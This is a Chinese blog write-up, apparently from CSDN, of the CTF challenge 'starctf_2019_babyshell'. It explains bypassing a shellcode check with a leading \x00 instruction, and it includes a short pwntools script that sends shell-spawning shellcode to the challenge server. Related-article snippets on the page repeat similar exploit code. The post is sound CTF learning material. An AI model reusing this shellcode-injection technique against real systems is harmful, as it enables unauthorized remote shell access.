BUUCTF之“starctf_2019_babyshell”

最新推荐文章于 2024-03-05 20:14:25 发布
最新推荐文章于 2024-03-05 20:14:25 发布
阅读量360 收藏
点赞数
分类专栏: 二进制pwn学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/122073456
版权

我只能说现在水平还太菜,每题都有new things~

盘点收获先:

IDA上,当直接F5无法出现伪代码时可以考虑在 “IDA view-A 上利用这个”
在这里插入图片描述
2.
在这里插入图片描述注意一下这里mmap申请的内存以后会将内存首地址返回给寄存器“rax”所以有了这边的赋值给buff
3. “ ((void (*)(void))buf)()”关于shellcode的调用方式这是一种
4. 本题核心:shellcode检查的绕过:

# pwn disasm 示例
$ pwn disasm -c amd64 0400
0:    04 00              add    al,  0x0

借鉴这位大神,大家快去学习

用 "pwn disasm -c amd64 ~~~"来得到汇编语句。

WP:

from pwn import*
context.arch="amd64"
p=remote('node4.buuoj.cn',29798)
pay='\x00\x42\x00'+asm(shellcraft.sh())
p.sendline(pay)
p.interactive()
Hvf0x
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
starctf_2019_babyshell
qq_62887641的博客
08-24 98
我们需要组成一个汇编指令,一来是绕过检测,二来是不妨碍shellcode。buf设置了可执行,所以往里面写shellcode就可以直接执行。当a1=0直接绕过这个,所以我们的在shellcode前面需要。可改got,没有canary,不可执行栈,没开pie。会妨碍shellcode的执行。介绍一个pwntools命令(
BUUCTF(pwn)starctf_2019_babyshell
半岛铁盒的博客
04-06 351
这里要求我们需要输入一个SHellcode 然后进入 一个 if 比较; 只需要通过\x00绕过检查, 同时执行我们输入的shellcode \x00B后面加上一个字符, 对应一个汇编语句。 所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查 from pwn import * context.arch = "amd64" p = remote("node3.buuoj.cn",27993) payload = '\x00B3' + asm(shellcraft.sh()) p...
[BUUCTF]-PWN:starctf_2019_babyshell解析(汇编\x00开头绕过+shellcode)
2301_79326813的博客
03-05 313
查看保护查看ida这里就是要输入shellcode,但是函数会有检测。在shellcode前面构造一个以\x00机器码开头的汇编指令,这样就可以绕过函数检查了。
CTF编写
02-15
cce-babyshell,simple_cmdshell,simple_pwn,simple_rop,simple_uaf,tpu dreamhack-检查标志 hacklu-sparc 卡夫-shadowstack kapo-cnc,ezbof pctf-emojidb,ipppc,mojo seccon-加密器,kstack,kvdb ...
[BUUCTF]PWN——starctf_2019_babyshell(有限制的shellcode)
mcmuyanga的博客
03-23 869
starctf_2019_babyshell 例行检查,64位程序,开启了nx main函数,往buf里写入shellcode,然后程序会执行shellcod sub_400786(),这个函数会对我们输入的shellcode进行检查 检查的时候*i即可退出,可以使用\x00来绕过。 ...
[BUUCTF-pwn]——starctf_2019_babyshell
Y_peak的博客
04-02 516
[BUUCTF-pwn]——starctf_2019_babyshell 学到了, 又学到了FMYY师傅太强了 只需要通过\x00绕过检查, 同时执行我们输入的shellcode就好 **\x00B后面加上一个字符, 对应一个汇编语句。**所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查 from pwn import * context.arch = "amd64" p = remote("node3.buuoj.cn",27993) #p = process("./starctf
[BUUCTF]PWN——actf_2019_babystack
mcmuyanga的博客
01-19 1365
actf_2019_babystack 附件 步骤: 例行检查,64位程序,开启了nx保护 本地运行一下看看大概的情况,有两次输入 64位ida载入 程序可以输入两次,加上只能覆盖ebp和返回地址,想到的是栈迁移的方法 栈迁移主要就是使用的leave和retn这两条指令,两条指令的实质是 leave:move rbp,rsp;pop rbp retn:pop rdi 利用思路 第一个输入点固定输入0xe0,造成溢出 19行会打印出s在栈上的地址,接收一下,获得栈地址 由于没有现成的system
BUUCTF之Secret File[极客大挑战 2019]
金 帛的博客
04-19 248
BUUCTF的WP
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
Buuctf 秘密文件
Dexret的博客
11-25 1665
下载该文件,发现该文件为一个数据包 利用wireshark打开该文件 结合题意,发现该题需要我们查询被盗取的文件是什么 过滤ftp数据包 选择一条数据包进行数据流追踪 在这里查看到被盗取的文件为rar文件 利用kail中的binwalk对该数据包进行文件分离 分离后得到一个rar文件包,但是该rar文件包解压时需要密码 通过ARCHPR对该数据包进行密码爆破 得到该压缩包的密码为:1903 利用爆破后的密码解压该压缩包,发现里面有一个txt文件 打开该文件得到该..
【Writeup】starCTF2019_Browser_OOB
BAKUMANSEC - Just Do It
08-19 879
本题提供了v8的commit版本号以及一个浏览器程序包,内含一个diff文件,关于如何配置v8环境已经在如下文章中记录:【环境配置】如何编译V8引擎并添加diff补丁 0x01 解题思路 ​  首先可以利用array.oob()方法进行数组对象MAP类型的读取,利用array.oob([map])进行数组对象MAP类型的修改。由此可以利用一个float类型数组和一个object类型数组实现两...
buuoj刷题记录 - starctf_2019_babyshell
qq_34010404的博客
03-31 171
输入shellcode ,然后检查shellcode 只要shellcode第一个字节是0就可以了,但是必须是有效的指令,否则无法识别会导致程序崩掉。 先填一个\x00看一下,对应的opcode 是add 后面的shellcode已经无法识别了. 看一下intel开发手册,找到add指令 可以看到对应的opcode是00,把后面的操作数补全(随便找个可以写的地址就行)就不会影响后面shellcode的解析了. 然后就可以getshell啦 Volume_2_325383_NoRestrictio
BUUCTF刷题7
m0_51251108的博客
11-09 342
题目:护网杯_2018_gettingstart:(浮点数内存表示)starctf_2019_babyshell:(有限制的shellcode)picoctf_2018_buffer overflow 0:[BSidesCF 2019]Runit:(shellcode)wdb_2018_3rd_soEasy:(栈迁移)suctf_2018_stack:(栈平衡) 护网杯_2018_gettingstart:(浮点数内存表示) 参考师傅:护网杯_2018_gettingstart(浮点数内存表示) · 语雀
shellcode题总结
seaaseesa的博客
05-01 1239
shellcode题总结 有时shellcode受限,最好的方法一般就是勉强的凑出sys read系统调用来输入shellcode主体。下面从几个题来加深理解。 starctf_2019_babyshell 现在shellcode字节允许的范围在表内 我们直接用IDA强制转为汇编,我们发现pop rdx、pop rdi、syscall可以用。 而执行shellcode时,正好...
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2574
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
N1CTF2019——babypwn WP
qq_41252520的博客
10-13 566
保护 我的测试环境为ubuntu16.04.1 分析 添加操作中限制只能添加10个结构体: 结构体为: struct Staff{ char Name[0x10]; char *Description; int Description_Size; }; 漏洞存在删除操作中: 总的二进制程序逆向分析到这,下面来考虑怎么利用。 利用 这道题和warmup那道题有点相似,但...
ASP外观专利图像检索平台(源代码+论文).rar
最新发布
07-21
ASP外观专利图像检索平台(源代码+论文)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值